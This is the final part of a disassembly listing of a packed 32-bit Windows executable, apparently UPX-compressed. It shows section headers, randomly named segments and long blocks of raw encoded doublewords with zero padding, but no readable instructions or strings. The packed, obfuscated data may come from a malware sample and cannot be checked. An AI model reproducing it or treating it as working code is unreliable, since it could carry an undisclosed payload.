dd 779201AAh, 0DCD4749Bh, 2BB0CEEh, 0F88989C3h, 0B5AECEB4h
dd 0EBB1A813h, 52B385D8h, 0DD32799h, 0AECC613Ah, 62425B38h
dd 0F1DD9927h, 0AB753FACh, 0F657B99Dh, 0C5BD37CCh, 5D4FEDF3h
dd 0CB45B7CEh, 0ABAEB292h, 1DFCD972h, 0BEC3E80Eh, 792D0E4Ah
dd 6EE2EB56h, 0C3D2099Dh, 899429A2h, 0DD710B16h, 0EF0E6894h
dd 300h dup(0)
_5qvhby1c ends
; Section 6. (virtual address 0003F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0003F000
; Flags 40000080: Bss Readable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read
c9dxisfm segment para public 'BSS' use32
assume cs:c9dxisfm
;org 43F000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 7CFF1DEh, 527AC518h, 80DE8589h, 940AC6EDh, 0C637105Ah
dd 2C42F41Bh, 9C5F9AFCh, 867284FBh, 875F819Dh, 70728468h
dd 19BB959Fh, 0E09CE9EDh, 4A839D84h, 0F5587E7Bh, 0F005E2F5h
dd 14BC1DEBh, 22792CD4h, 31F092D6h, 49E0D6D6h, 94CA413Fh
dd 7709A5C2h, 996C3B7Eh, 5BF105E3h, 8AFAB664h, 1D4C5E84h
dd 0A8341537h, 515B6C09h, 0D3433F19h, 0C7FAB461h, 0F1C26B1Ah
dd 0C55857EAh, 78034D0Ch, 9D89CD25h, 0EABE1E0Ah, 465C7866h
dd 0ADF367ADh, 952F1CE3h, 0B7D3A636h, 3F490D03h, 666830C1h
dd 469CC661h, 3A07D1EEh, 6F22D61Ch, 6F198210h, 2C3378ADh
dd 76183D48h, 579ECB47h, 49CEAFFBh, 57330AA6h, 206AF1CBh
dd 6030AB9Fh, 0F065150Fh, 0A05409BEh, 99959F09h, 883CA4F5h
dd 6B426765h, 0E1621243h, 1FF8D294h, 9538F811h, 0E4223122h
dd 0F1F820D8h, 0EA23DA8Dh, 0C6FAC99h, 9F383766h, 0B420BA66h
dd 17D0C6C3h, 7C350AB3h, 7A411896h, 0C709E146h, 0BF11E30Bh
dd 0ED4BBA28h, 0C8B022EBh, 75284311h, 0C3CC0A1Ch, 0B31062E9h
dd 0A2F78472h, 76EF018h, 6482D960h, 327E47E2h, 0C9941DF3h
dd 0BF6275EDh, 7728C0DAh, 13BD1620h, 7691279h, 13028060h
dd 0F1344199h, 4B7E80E2h, 2A110F6h, 0FE11A1CEh, 0A988315Fh
dd 0D556CF9Ah, 1EA5383Dh, 234FB9F0h, 0F0243FA6h, 6D42728Ch
dd 0E09B2904h, 4BE3322Dh, 0ECD5036Ah, 65A81F1Ah, 1D949A0Fh
dd 0FFC07307h, 50B677AFh, 0D417A371h, 4F1C418Ah, 0DE018452h
dd 4F93B5D4h, 0D2FE40F6h, 41F6CDCAh, 0B9C2AD9Ah, 0CEE651BCh
dd 0F3906097h, 0E0339EA1h, 0B17648E2h, 8ACF447Bh, 5778DF3Eh
dd 9FB06705h, 0F5FBB73Dh, 54848B4Dh, 0BD4A5CA3h, 21DD8F58h
dd 980FA02Ah, 2CEEE46h, 0C5FE4CDEh, 621CC768h, 99A16682h
dd 7ECAB082h, 3104F30h, 0CB3FC6F7h, 380h dup(0)
c9dxisfm ends
; Section 7. (virtual address 00040000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00040000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 440000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start